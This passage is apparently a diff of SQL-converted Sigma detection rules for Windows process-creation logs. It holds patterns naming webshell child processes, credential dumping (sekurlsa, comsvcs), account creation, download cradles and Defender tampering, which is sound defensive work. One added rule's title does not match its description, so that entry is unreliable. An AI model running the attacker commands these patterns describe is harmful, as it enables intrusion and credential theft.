Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "status": "experimental", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "status": "experimental", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", - "author": "frack113", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "status": "experimental", + "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", "tags": [ - "attack.collection", - "attack.t1005" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ - "Unknown" + "Other programs that cause these patterns (please report)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "status": "test", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_node_abuse.yml" - }, - { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", - "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" - ], + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "status": "experimental", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_susp_download_office_domain.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "status": "test", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR 